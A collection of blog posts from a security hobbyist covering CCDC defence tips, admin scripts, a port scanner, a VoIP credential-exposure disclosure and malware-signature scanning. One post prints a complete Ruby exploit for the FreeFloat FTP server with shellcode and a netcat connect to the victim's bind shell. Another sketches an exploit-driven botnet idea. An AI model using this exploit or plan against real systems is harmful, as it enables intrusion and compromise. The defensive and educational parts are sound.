Recently I was able to speak at the PA Hackers first meet up (http://www.pahackers.com). My topic for this meet up was Phishing Attacks and Defense. I even went as far as to provide a live demo using the SET (Social Engineering Toolkit). The talk had some bugs due to technical issues, but we made it through and the audience enjoyed it. To see the slides from my talk click this link. FINAL-VERSION

If it wasn’t for Karen Carter and her research project on iScanner and iScan I would probably never even know there was an issue as I have not visited this code in some time like most things I post about. It is not that I was no longer interested in adding to it or learning how to detect malicious codes in site it was just a matter of time. She contacted me via the site and explained she had an issue using iScan after reviewing her error and reproducing it, I found the issue that I stated above. The recent ruby upgrades made the gem I was using no longer useable.

Though I was not able to rewrite the full code for Karen prior to her presentation I have been able to write a 2.0 beta using faster crawling and scanning. However in the beta reporting is still not great. All results are saved to results.txt and you can use that file to reference the infected files reports and site scan reports, once done make sure to clean up to save space.

To use the new code you will need ruby and the anemone gem installed. Once you have those items you can run the program by typing ruby iscan.rb. You will be prompted for the domain to crawl. Enter the domain and hit enter.

To download the iScan 2.0 beta go to: http://www.digitaloffensive.com/files/iscan2.rb

To read my original write up on this subject go to: http://www.digitaloffensive.com/2011/03/detecting-malicious-code-in-webpages-iscanner-and-iscan-script/

To learn more about iScanner go to: http://iscanner.isecur1ty.org/

To see Karen’s well detailed and educational video on how to use iScanner and iScan go to: http://youtu.be/gxslbpS0R2k

Any questions or concerns feel free to post them below.

Despite some popular beliefs the Blue Cell are not provide machines that already been back doored for the Red Cell to use. The machines that you are giving are definitely built in an insecure method but that’s it.

Your object coming into this event is usually the same year after year. XYZ Company fired their incompetent IT staff. Their incompetence will make your next two days a living hell. You are coming into this organization blind, you do not know nor should you trust the current systems or infrastructure. Though you would like to start from the ground up you need to keep business going and repair the damage while defending an onslaught of attacks.

So how do you get the upper hand? Time is of the essence. The Red Cell is very skilled and some can operate almost as fast as an automated program. That being said when the start bell goes most likely within seconds we have several shells on your machines, plus the default credentials of your web apps, firewall and other devices on the network that year. To get the upper hand I personally believe you need to accomplish this at the network layer as well as working as a team. You need to lock down the firewall as quickly as possible to buy yourself time to CLEAN and remove malicious software, patch systems to avoid re-infection, change your passwords to avoid access, assure there are no new accounts that have been added, trace cables to assure there are no rouge devices and to implement your CCDC game plan.

During this time it is important to remain calm and professional. Remember this is only a game at the end of the day. Though acting in an unprofessional manner will cast a shadow over yourself and school especially since there are many recruiters in the audience watching how you act and respond. These are the people you will be working for if you survive this event and decide that a career in information security is for you.

So how do you lock down your firewall? I am not a CISCO expert by any means though I have had my fair share of time on these devices both in previous jobs and at the CCDC.  First I suggest that if your team has a budget that you look at investing in a CISCO ASA 505 for your schools lab so you can train on it. This is not only good for the competition but is a great training aide as you get ready to enter into the real world, you can say you have CISCO ASA experience. You can find them for a few hundred dollars or less on: http://www.ebay.com/sch/?_nkw=cisco%20asa%205505&clk_rvr_id=326713534867 . Second I suggest you do some reading: http://www.cisco.com/en/US/docs/security/asa/quick_start/5505/5505-poster.html , you have several months to the next CCDC qualifier.

These devices have to main ways to administrate them. The first is through the ASDM software and the second is through command line. The device during the competition is already configured for you saving you a lot of time, but also making you very vulnerable.

1. Change the default password
2. Save the changes to the flash and save <= the same as a wr mem at command line. Saving itself will not keep the changes unless you reboot. Saving the changes to the memory will apply instantly avoiding cisco/cisco being used even if you changed the password.
3. Disable remote administration of your firewall on the outside interface. If the TRUE scorebot needs ssh access then limit it by the TRUE scorebots IP.
4. Disable any any IP allow and create a policy above it that only allows the ports you need. Make sure you know your basic port numbers
   1. 80 => http
   2. 443 => https
   3. 21 => ftp
   4. 22 => ssh
   5. ICMP => protocol not port
   6. Make sure logging is enabled on your rules and the time on your firewall is correct. This is very important in your incident write ups to show logs and have the time match up. Limited time drift in logs are permissible in court but large discrepancies will be thrown out.
   7. Save your changes to running memory and save.

In the event you are not allowed to block IP addresses without cause nor can you block large ranges of IP addresses. So how do you get the permission to set a block? In the real world this is called a business need. For example:

“Dear Mr.Ceo;

During a recent firewall audit the IT Security department has found that several questionable configurations on the firewall that were left there from the previous IT team. These configurations are opening the organization to undue risk by allowing remote administration of the firewall to any one on the internet. Though we have set the password to properly secured one this doesn’t guarantee full security and it would be wise to lock this feature down to only our remote offices and internal staff.

Sincerely IT Security department”

So now that you are working on locking down your firewall what should the rest of your team be doing? Well that is simple; you have up to 8 team mates that should be accomplishing other tasks while one maybe two people are working on locking down the firewall. This is one reason why the red cell does so well, we break down into teams and divide and conquer.

So how should you divide your team up? I would do it by skill set and the below:

A person or persons working on changing system passwords: these individuals should know basic windows and Linux user account administration. Think about on the Linux system doing away with passwords all together and requiring the use of ssh keys.

A person or persons working on web applications: Make sure they know where each application is located. Make sure not only the administrator passwords are changed but all user passwords are changed. Think about having these team mates lock down admin directories to only internal IP ranges by using .htacess files or another method.

A person or persons working on identifying and disabling services: Make sure that you know what is running. Verify that what is running is required and if it is not required then disable it. This user should know how to use services.msc on windows and /etc/services in Linux as well as service blank stop or start.

A person or persons working on applying system patches: Have them focus on remotely exploitable patches first then other patches. Since the firewall should be locked down now exploits like smb will not be as high of a risk.

A person or persons tracing wires and securing wireless: Make sure you know what is plugged into your network and where each wire goes into. WEP is not your friend. It sucks when your IT department comes in that night and rewires things for you and adds devices for your job to work better J

A person or persons monitoring connections and logs: this person should be familiar with the tool tcpview, netstat and log reading. They will be the one that should help detect intrusions and gather evidence for the incident response.

A person or persons working on business injects: Even though there is a threat to your environment, business needs to remain running. Make sure it gets done or you will be done.

If you have any additional people that are not physically working on a box have them become the note takers, document what you have done. Or you can make them a gopher to go get coffee or other supplies. The team captain should be this person. They should act as a manager and supervise dictate and control. They are there to execute your teams plan and keep you guys coordinated and motivated.

This may seem like a lot and not able to be accomplished in an hour, but it can. You will need to run in parallel with each other and multitask. If you have questions please feel free to contact me and remember to reach out to the Red Cell members for help and input throughout the year.

This guide is to be high level and provide a reference for the CCDC Blue Cell to use to help secure their Linux boxes during the CCDC events. This being said this document does not guarantee your victory.

My understanding is during the contest tools can be downloaded if the tools are free for commercial use. With that being said I will base some of my suggestions on that. Remember time is important. We are already on your box. Also my thoughts may be different than other red cell members.

Before the event

1. Study this: http://www.sans.org/score/checklists/ID_Linux.pdf
2. Learn Linux basic administration and file editing.

Remote and Local Administration Security

1. Logon to the console: service sshd stop
2.  Change root password
3. Disable root login in the sshd.conf
4. Remove any keys that exist in .ssh
5. Create new keys
6. Disable password login and use keys in the sshd.conf
7. Install apf firewall : http://www.rfxn.com/projects/advanced-policy-firewall/ or learn Iptables
8. Edit the configuration lines for ingress and egress ports, don’t forget protocols as well so ping works.
9. Install BFD: http://www.rfxn.com/projects/brute-force-detection/
10. Edit the configuration files and start apf and bfd
11. Start sshd backup
12. Verify before disconnecting your keys work.
13. Change keys often.
14. Know what users belong on the system and which had been added.
15. Last command to see who logged on to your box last and from where also w to see who is on now and from where. Unknown IP’s are an incident.
16. Look for hidden directories mkdir “…” <= Bad
17. Set none root users to a jailed shell so they can’t run anything.

Database Security:

1. Change or add a password for mysql or postgres . Warning may damage some of the web apps depending how they were installed.

Web Security:

1. Use ModSecurity for your web apps
2. Use .htaccess files to restrict the admin sections of your web app to local IP addresses.
3. Change default passwords
4. Lock down access to phpmyadmin, no need for outside access to it.
5. Lock down webdav, no need for that.
6. Cat /var/log/http/access.log and error_log to look for web hacking attempts and who tried them.

How many of you would of even thought that the scanner on the med station was actually hackable itself?  Before Brad and I went around hacking them with a simple piece of paper that left them unusable until reprogrammed with another sheet of paper that I gave to the white cell. How many of you were able to figure out how to fix them by researching the product and not going right to the white cell or Larry and Darren?

Up to this event I never really thought about how insecure barcodes were and never really thought how readily available they are for duplicating and circumventing security measures as well as possibly injecting attacks into other systems.

Check these YouTube videos for more on their dangers:

http://www.youtube.com/watch?v=cEDqdYBtpvg <= Three part video of a talk done on barcode hacking at Defcon. This gave me the idea for the attack at the CCDC.

While sitting at my office the day before the CCDC I was watching the twitter trend and notice someone uploaded a picture of the med station and you could see the scanner. I saved the picture and removed everything else out of the picture using gimp except the scanner. I then used the Google Goggles application on my android phone to take a picture of it and to have it tell me what model it was and who made it. In the first several links Google returned I found that it was a Honeywell barcode scanner model MetroSelect. Knowing this and having a few ideas of an attack based on the You Tube video above, I searched Honeywell site for the configuration guide that will provide the codes to configure the scanner. The guide can be found here: http://www.honeywellaidc.com/CatalogDocuments/00-02544%20Rev%20K%202-11.pdf . Side note once I got to MD, I found that we had our own med station and was able to confirm the model was correct as well. But the above gave me the ability to start my research and was actually 100% accurate.

The guide has over 116 pages of information and codes on how to configure the scanners. We used the information found on page 1-2. We made a quick disable print out and a quick enable print out. These codes allowed us to stop your scanners from scanning your badges until they were re-enabled. Though as you all know that was probably the least of your med station problems. Such as the Christmas incident, lock removal, lock additions, wifi attacks and so on.

Hopefully you find the info above informative and it gives you an idea how we think and plan some attacks.

Have you ever needed to create 100’s if not thousands of new firewall nodes or networks in your Checkpoint firewall? If so you know how tedious of a task this is and you may have even researched means to do this faster.

Research shows there are two tools to do this, the first tool being “dbedit” and it comes on your management server and the second being a toolkit called “Ofiller and Odumper” by Martin Hoz. The latter is no longer being developed but seems to still work on the newer 7.0 code and first one is pretty complex but easy to learn.

Though Ofiller and Odumper have many features and still works, I have an uneasiness using a tool on my enterprise firewalls that is no longer being developed. So to accomplish my task at hand I used dbedit and a ruby script I wrote to create a dbedit import configuration file from the CSV file of IP’s and names. To learn more about dbedit or to find the syntax for dbedit check the following URL: http://downloads.checkpoint.com/dc/download.htm?ID=5518 .

In my problem I had over 100 + nodes that needed to be created and added to a group. The CSV file I had listed the IP and the Name of the facility. Now I just had to go line by line taking column 1 input and setting that as the IP and column two input as the node name. To do this I wrote the following script:

http://www.digitaloffensive.com/files/rbcpgen.rb

This script is great for understanding how the process works and with a few tweaks it can be used on your Checkpoint Firewall as well. The script is to be run on any Linux or Windows box that supports ruby. The import that is created needs to be moved to the management server of your Checkpoint firewalls by either SCP or copying and pasting the contents of the import into a new file on the management server.  Once the file is on your management server make sure you are in expert mode and issue the following command:

dbedit -f file_name –s localhost –u admin_username and then press enter and enter the password.

Before you do this make sure that your CSV file does not have any duplicates before running the script. I know I should of added it in, but this was a last minute rush job for work. Also make sure you have a backup of your database in case something breaks. You use this script at your own risk.

If you have any questions or concerns please feel free to contact me.

Now jump forward 4 years. I am at a new job that does not offer training opportunities like this so I can not afford to attend another one of these camps on my own so I decide to just pay for a re-cert attempt. These attempts include the new books for the course. The new books did not change much from the originals and while reading them it all came back to me like riding a bike.

Since the test is open book I was not to worried, but you need to remember open book can be your best friend or worse nightmare as the test is timed. I made sure I knew the information inside and out and to get the most use out of the books I wrote the following study guide. If you decide to use my study guide I suggest that you verify the page numbers in it and update it appropriately for your version of books. The study guide lists the key points in each chapter of the book and provides where more details can be found on that key topic. In the sections on attacks it lists the attacks and defense along with the pages to additional information.

This guide and studying helped me score over 95% on the test this time around.

Download it below

SANS GCIH CERTIFICATION GUIDE-V2

If you found this study guide to be useful and would like to donate something to help keep the site going please do so below:

This script will go line by through a text file checking to see which IP is up. If the host is not up it will log to the results.csv file as “IP,DOWN,NoName”. If the host is up it will log to the results.csv file as “IP,UP,hostname”. Please note that if the authority DNS server does not have an answer for that IP it will log no name and instead will put the IP address again.  This script is very handy on our firewall audits and cleans ups to see what hosts are still needed and which are no longer even turned on any longer.

You will need to have the IP addresses you want to check in a file called IP.txt, unless you edit the script. Make sure you put the file in the same path as the script.

#!/usr/bin/ruby
require “socket”
require ‘resolv’

def computer_exists?(fwip)
system(“ping -c1 -w1 #{fwip}”)
end

def append_to_file(line)
file = File.open(“results.csv”, “a”)
file.puts(line)
file.close
end

def getInfo(current_ip)
begin
if computer_exists?(current_ip)
host_name = Socket.getaddrinfo(current_ip,nil)
append_to_file(“#{current_ip},UP,#{host_name[0][2]}\n”)
else
append_to_file(“#{current_ip},DOWN,NoNAME\n”)
end
rescue SocketError => mySocketError
append_to_file(“#{current_ip},UP,ERROR”)
end
end

#Myfavorite method, read and process file
ipLST=’IP.txt’
File.readlines(ipLST).each do |line|
current_ip = “#{line}”
getInfo(current_ip)
end

A revised bill putting the burden to protect copyrighted material on the entity is what is required not giving the government the ability to make the decision what to block and what not to block. Our government has more important issues to deal with then doing the legal leg work that these entities should be doing to protect their content.

Watch the video below for more information:

http://www.youtube.com/watch?v=n0X5WCmyokw

To get more information on the bill from a more reliable source (EEF):  https://www.eff.org/deeplinks/2012/01/how-pipa-and-sopa-violate-white-house-principles-supporting-free-speech

To sign the petition click here:

https://blacklists.eff.org/

Daniel Suarez wrote in his book Daemon about a man that upon his death a strategically crafted computer system that would launch a mulitude of events that range from something extremely simple to murder. In the book he mentions how there are a multitude of systems monitoring different resources for this person’s death. What if we eliminated the need for such a vast system and used the number one social media site and a simple application. What if we stream line the process?

Today I stumbled upon an application for the social media giant Facebook called “If I Die” (http://www.ifidie.net). This application allows you to record a message or a post that upon your death and verification of your three trustees will be posted to your Facebook account. Wow now over several million people will know I am dead before the newspapers even have the first obituary with my death printed.

So you are now thinking how does this line up with the book the Daemon? Well let’s go back a few months to my Facebook bot I wrote (http://www.digitaloffensive.com/2010/08/facebook-bot-fbcbot-pl/). This bot would monitor my Facebook account for key word posts then launch commands locally to carry out my wishes. So right now you are probably thinking that’s all fine and dandy if you have a system you can guarantee will be up and running all the time as well at least for a short time after your death. Well what about cloud computing? How about Amazon cloud? They offer you a free cloud system as long as you stay below a certain usage each month. From my past usage of the system they charge you at the end of the month or in increments for usage of the cloud. So even if you are dead and your bill can’t be paid it does not matter cause after your bot detects your death it can now do whatever you want, such as create a bot net.

So the process would be this. Upon my death (if this application still exists) my bot running on the cloud will see my post that will give it my final command. It will then check several sites like ww.exploit-db.com for new vulnerabilities. It will then use key Google Dorks from what it found on exploit-db.com to build a list of vulnerable servers and to use the code found on that site to start attacking and infecting these hosts. Right now you are wait this is illegal! What do I care I am dead! Once the infection spreads to multiple hosts it does not matter if my cloud is shut down for nonpayment as my bot net has started.

Now that you have an idea where I am going with this train of thought think about other things you can do? You have a life time to prepare your master piece

Pictures and code for fbcbot.pl ” I am dead code will be posted shortly”

Requirements:
1. Windows vista or higher (preferably 7)
2. Powershell 2,0
3. user access control disabled
4. Acuentix installed (v7 or higher)
5. List of sites to scan

Adding functionality:

To add functions to the wvs_console call edit the variable $scan

Code:

################################################
## Automate Acunetix Console Scans
## Edit $scan to add more function (profile, report type, etc)
## Created by Michael LaSalvia
## http://www.digitaloffensive.com for http://SecurityonLocation.com
###############################################

Set-Location “C:\Program Files (x86)\Acunetix\Web Vulnerability Scanner 7″
# Add my directory to the current PATH
$x = (Get-Location).ProviderPath
$env:path = “$env:path;$x”
write-host “Current directory added to ENV:PATH”
##################################################
##Edit below but be careful
##################################################

$sites= Get-Content c:\mytest\sites.txt
foreach ($i in $sites) {
$scan = “/scan $i /generatereport”
Start-Process ‘wvs_console.exe’ -WindowStyle hidden -Wait -ArgumentList $scan -PassThru

}
exit

How to run:

Place code in a file called whatever you want .ps1 and make sure to sign so you can execute it with powershell. Also make sure to edit the variable sites and variable scan to meet your requirements.

Any questions or concerns feel free to contact me.

The original vulnerability was published here: http://www.exploit-db.com/exploits/17550. The FreeFloat FTP server is a free standing executable FTP server requiring no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. Though the trick is not to make it to crash but to gain shell access, Mortis original published the working exploit in python. What we have done here is converted it into a ruby exploit. Why? Simply cause while learning ruby I took it as a challenge to test what I have learned.

Exploiting the vulnerability

To test the actual exploit download the vulnerable software and install it on a Windows XP SP3 machine: http://www.freefloat.com/software/freefloatftpserver.zip. Next on a Linux machine copy the ruby code provided and save it to a file called ftpexploit.rb and chmod it to 777. To run the exploit type in ./ftpexploit.rb and enter the victims IP. If the exploit is successful you will get a windows shell.

The Exploit

#!/usr/bin/ruby

#

#FreeLoat FTP SERVER ACCL BUFFER OVERFlow and remote shell Exploit

#Original Exploit by: Mortis as found on exploit-db.com

#Code redesigned into ruby by genxweb from digitaloffensive.com

###############################################################

###############################################################

require ‘socket’

puts “Enter the IP to Exploit: ”

h0st = gets

victim = h0st.chomp!

#open listener shell on port 4444

sc = “\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2″

padding = “A”*246

sled = “\x90″*20

jmpesp = “\x13\x44\x87\x7c”

sploit = “#{padding}#{jmpesp}#{sled}#{sc}”

s = TCPsocket.new(“#{victim}”,21)

s.recv(1024)

s.puts(“USER test\r\n”)

s.recv(1024)

s.puts(“PASS test\r\n”)

s.recv(1024)

s.puts(“ACCL “+sploit+”\r\n”)

s.close()

puts “#### IF EXPLOIT IS SCUCCESSFUL SHELL WILL OPEN ####”

puts “###################################################”

system(“nc #{victim} 4444″)

How the code works

First we ask the hacker for the victims IP address. Once we have that we remove the trailing new line statement using the chomp command. Now that we have the victims IP we build the packet that will be sent over the socket we open.

The first part of the packet is the padding and sled. This gets us to the point where we can overwrite the memory with our shellcode. The jmpesp variable is the place in memory in big endian format to enter our shellcode. The shellcode is a generic shellcode to open port 4444 on the victim’s machine with a windows command line access.

Once the packet is built we open a connection to the victim on port 21, the standard ftp port. Once the connection is built we send the user: test and password: test. After that we then send the ACCL and exploit packet. If this is successful a shell will spawn on the victims box.

Finally the exploit will then use netcat (nc) to connect to the victims machine so you can interact with the victim.

This is a simple script I wrote in ruby to scan ports to see if they are open and grab the banner of the service.  The script has error handling built in so it is able to continue on to the next port if the port before is closed. Port banners are displayed to the screen. If you want to log them to a file just alter the print statement to redirect to a file. To change the port ranges to scan alter the line where the “for loop” is 0…65536. This script will only do tcp and not udp. The script was written for fun but when you are doing an actual audit sometimes you cannot install tools on the machines or with in the network you are auditing. This will allow you to use a piece of software that is installed on most new Linux machines.

#!/usr/bin/ruby
#Simple Ruby Banner Graber
#Created by Mike @ digitaloffensive.com
#######################################

require ‘socket’
puts “Enter the IP to scan: ”
bIps = gets
puts “Now scanning #{bIps} for open ports”
for sPorts in 0…65536
begin
bcon = TCPsocket.new(“#{bIps}”, “#{sPorts}”)
bcon.puts(“get / HTTP/1.1 \n\n\n\n\n”) #http is picky
bhead = bcon.recv(100)
bcon.close
print bhead
rescue
puts “#{sPorts} is not open, continuing”
end
end

A little over a year ago Nettalk came on the scene as a competitor to Magic Jack. They were not only a competitor, but a neighbor having their corporate office located extremely close to Magic Jack’s office. Their claim to fame was you did not need to have your PC on to use their device to make calls.

Since day one there was a group of people that were dead set to find the coveted SIP Credentials that would allow them to bring their own device and not have to use the nettalk device. Magic Jack has successfully, for the most, part made this impossible for the users which drove more clients over to Net talk and other services.

Nettalk has not been so successful in blocking its users from obtaining their credentials; though until now it was only possible to obtain your own credentials.  A research from West Bengal India has discovered a way to do get everyone’s credentials and has released a tool to do it.

The researches name is not 100% known.  The aliases on the http://www.magicjacksupport.com forum are “vj224” and “Valavan Jabbar” is in the signature. Recently, the signature also contained the website: http://www.visva-bharati.ac.in/Rabindranath/Rabindranath.htm . It looks like the mods have edited the post as well to remove the tool and contact information. Looking at the pictures and the post: http://magicjacksupport.com/nettalk-sip-via-tftp-t10925.html It is quite easy to figure out how this person did this and how to reproduce this with a few lines of code.

The vulnerability is mostly from negligence and poor design. The researcher more than likely used a packet sniffing tool to discover vulnerability and then attempted an exploit manually.

Based on the post on the  Magic Jack Support forums and the screen shots I took: An attacker can download the configuration of any Nettalk user by knowing the MAC address of the device and the last 4 digits of the device serial number;  Using a simple brute force method you can quickly pull the configurations of multiple users in matter of hours, if not minutes. To speed up the attack you can find the manufacture of the Ethernet chip in the device and see what numbers they use for the start of the MAC to define that it is theirs. This will cut down the amount of possibilities you need to guess.  You could even run the code in The Cloud like several password cracking tools use today.

Write up of the Researcher’s findings: http://magicjacksupport.com/nettalk-sip-via-tftp-t10925.html

Screenshots and my personal logs with dates:

On 6/24/2011 I received a LinkedIn invite from a Thomas Hutton a Senior Engineer of nettalk. Since contacting Nettak, Thomas has altered his LinkedIn profile to hide all relations to Nettalk. Through the magic of Google cache here is his profile before edit. Below the before is the after edit.

Before Edit: (Click for larger view)

After Edit: (Click for larger view)

I accepted his invite and moments later I got the following message from him accusing me of releasing this vulnerability and tool, he then continues to slander me questioning my moral and ethics. Ethics and morals is something that separates the Information Security Professional from the malicious hacker.

I like for you all to reread the first line, second sentence. Yes you read it right Nettalk knew its client’s data was vulnerable and chose to ignore the vulnerability hoping no one else would find it.

I responded to these acquisitions with the following message:

This all took place around 8:30 am EST on 6/24/2011. It is now 5:00 PM EST on 6/24/2011 and I have not received and apology from him. I have contacted Nettalk customer service and I am awaiting a response from corporate to provide them this information. If they do not respond by close of business today I feel that is my duty to inform its clients about their blatant neglect for their client’s privacy and safety.

In the meantime nettalk should turn off the tftp server or setup a filter on their firewalls / IPS to look for multiple connections from the same IP for different configuration files.

06/25/2011 – Nettalk has not responded yet to my reach out attempts. Thomas has basically changed all his Linkedin information. [RECOMMENDATION] Clients of Nettalk should keep an eye on their phone bills and their personal information. Using the SIP credentials not only can an attacker place a call they can receive calls as well. This means they can impersonate you and gather additional information to use in other unethical ways.

If you are visiting my site from Nettalk please feel free to contact me via email. Provide your telephone number and position in that email and I will be more then glad to call you to discuss this.

iScanner is developed by the folks over at iSecur1ty.org. The latest update of code was in September of 2010. The iScanner application is ruby based application that has many features:

Current Features:

• Ability to scan one file, directory or remote web page / website.
• Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares.
• Extensive log shows the infected files and the malicious code.
• Support for sending email reports.
• Ability to clean the infected web pages automatically.
• Easy backup and restore system for the infected files.
• Simple and editable signature based database.
• You can easily send malicious file to iScanner developers for analyzes.
• Ability to update the database and the program easily from iScanner’s server.
• Very flexible options and easy to use.
• Fast scanner with great performance.
• Yes, it’s FREE!!

I found this tool extremely interesting and started playing with it. Overall it is a great tool though I found it was missing some functionality that I wanted.

1.       It does not have a flag to index and scan the whole site for malicious code.

2.       The database is extremely small and does not detect some common variations of C99 shell.

To resolve the first issue I used the ruby module Hawler and a modified version of htmap created by John Hart of Spoofed.org. This allowed me to get an index of all links that are linked to on the URL you want to scan. Once I had that information I was able to create a simple shell script to loop through the list scanning each page. I even went as far as to only output the infected pages into a report for easy reference.

To resolve the second issue I created my own database based on information I found on the internet and from personal research. I found using a web tool like Rubular, http://www.rubular.com/ great for testing my regex strings.  We also are experimenting with downloading known malicious URL lists and auto creating signatures to use in the scans. We will be releasing this code in our next article.

For testing purposes we created the following signature and added it to the database:

a)      — 9.3

b)       - (eval)

c)       – PHP ‘eval’ functions detected, possible encoded malicious code.

d)      – MU:RE

• Bullet (a) is he signature number; this should be unique for your reporting.
• Bullet (b) is the regex string. The regex string is encapsulated in ()
• Bullet (c) is a comment about the malicious code.
• Bullet (d) tells the app to scan multiple lines to match the regex and to also check when remotely scanning

For more information of the creation of custom signature files check out the README file that comes with iScanner it is extremely easy to follow.

So let’s take a look how to install all of this and how to use iScan script:

1.       Make sure you are running linux and have ruby installed or the ability to install ruby.

2.       Install the Hawler ruby gem: gem install –source http://spoofed.org/files/hawler/ if any dependencies are needed make sure you install them as well.

3.       Download the modified version of htmp and iscan.sh (found in the zip file with the rest of the scripts from this article).http://www.digitaloffensive.com/files/iscan.zip

4. Download iScanner from: http://iscanner.isecur1ty.org

5. Uncompress iScanner and run the installer.

6.       Copy iscan.sh to the directory you want to run it from and edit the variables to suit your need.

7.       chmod 777 iscan.sh and run it by typing ./iscan.sh and follow the onscreen directions.

a.       Using the Hawler gem and the modified htmap you will be able to scan all links on the url you enter as well as set how deep you want to crawl. Remember the deeper the longer it will take.

Now that we have all the tools we need let’s create a test environment:

1.       You will need a website for this to work. If you do not have one you can install and run apache on the Linux box that you are working on to use this script.

2.       Create a index page in the root of the web directory with a single href code to test.html

3.       Create another file called test.html and put the word eval in it and anything else you want.

4.       Put my test signature in the signature database and save.

5.       Run the iScan script and follow prompts.

a.       You will be first prompted for the URL. Use the full domain or the IP here. IE www.domain.com, domain.com, or 127.0.0.1 avoid using /.

b.      Enter the depth you want to scan. Since this is a test set it to 1

c.       Sit back and watch

This script is pretty basic we are working on making reporting better as well as adding the ability to grab known malicious url black lists and hopefully know malicious code samples and increasing the signature database. The only current down side we see in the iScanner app after using our script is the lack to scan for malicious code in a database.

If you have comments or questions let me know.

A little over two years ago I met the girl of my life, not knowing at the time she would one day be my wife.

Social Engineering: The Ring

One day while out shopping she found the ring she would later on wear. The only issue I had was it was more then what I planned on. Though how could you say no to the one you love. I did not let her know at the time and continued to ask what she thought of other rings making sure her heart was definitely set on that one.
Then one evening as I was getting ready to leave work I called her letting her know I was going to stop at the store to get some water. She told me since I did not feel well that she would stop at the store for me and meet me at home. I figured this be the best opportunity to surprise her. Though I was super ill I ran to the store and bought the ring knowing that she would stop by there on the way to get the water to look at it like she normally did. I got to the store and purchased the ring to find that this is a one of a kind ring with no others available like it from that store. Nor did any other stores have one. I spent the last several months visiting jewelers showing them pictures of the ring and asking if they had one like it, all of them were amazed by the design. Once I heard this I knew she would call me tonight to let me know that the ring was gone. Like clockwork the call came through and you can hear the disappointment in her voice.

Phase 1 was completed she had no idea that I bought it for her or what was to come.

DNS Poisoning and ARP Spoofing: The Proposal

Before continuing to read, for those non technical people out there or in the event that the owner of Hip2Save ever reads this, NOTHING malicious was done to their site and all the below took place on my own personal network using our own personal equipment.

What is a better way to say I love you then poisoning the one’s you love DNS to send her to a false site that looks like the original site but has a personal deal, poem and directions. I decided to use the site www.hip2save.com. The site offers daily deals and she loves to visit the site and get free / discounted products, I know we will have to work on her giving away her info so freely. I used wget –m to download a mirrored copy of their site to my apache directory on my backtrack box and altered the page to look like the below image:

That was the easy part. The next part was carrying out the actual spoof and poisoning. Remember it is a race condition to see what DNS server answers first. So I cheated here and set my firewall to my malicious DNS server that I installed on my backtrack so I knew I would win. When I think about it, it would have been easier to setup my own zones for the sites I wanted to hijack, but where would the challenge be there. With that in place I used Dsniff’s arpspoof to take care of the arp s this did not take out my wireless switch like ettercap did. Then I used ettercap –T –q –P dns_spoof (after editing the etter.dns file of course). I also enabled IP forwarding so the packets could be forwarded out and I used my DNS server to handle all the non hijacked sites. The above took several days of testing and researching before I knew without a doubt that it would all work.

Exploitation: Popping the question

Several hours after she got home from work we were both sitting on the couches watching TV and surfing the net when she said “what is this” and started to cry (Happy tears). I was like what’s wrong as I got off the couch and approached her to see what she was talking about (already knowing).  I pulled the ring out and asked her to marry me while getting down on one knee.
She said: Yes and was extremely impressed with my idea for the proposal and even though she doesn’t know anything about hacking she asked that I explain to her how I did it.

Tonight I got an OTA (over the air update) from code 2.1 to 2.3 and wouldn’t you know it broke my existing root. You would figure since rooting is now legal they would not touch files that don’t belong to them or change your security settings but they do. So a quick Google lead me to Z4Root, unfortunately it has been removed from the market place but it can be downloaded from http://www.droid-life.com/2010/12/09/z4root-will-root-the-droid-x-2-3-340-update/ .

Once you download the file follow these easy steps to get root back or get root for the first time.

1. Connect the phone to the USB of your computer and choose mass storage mode.
2. Copy the file to the root of the SD card
3. Unplug the phone and let the SD card become ready
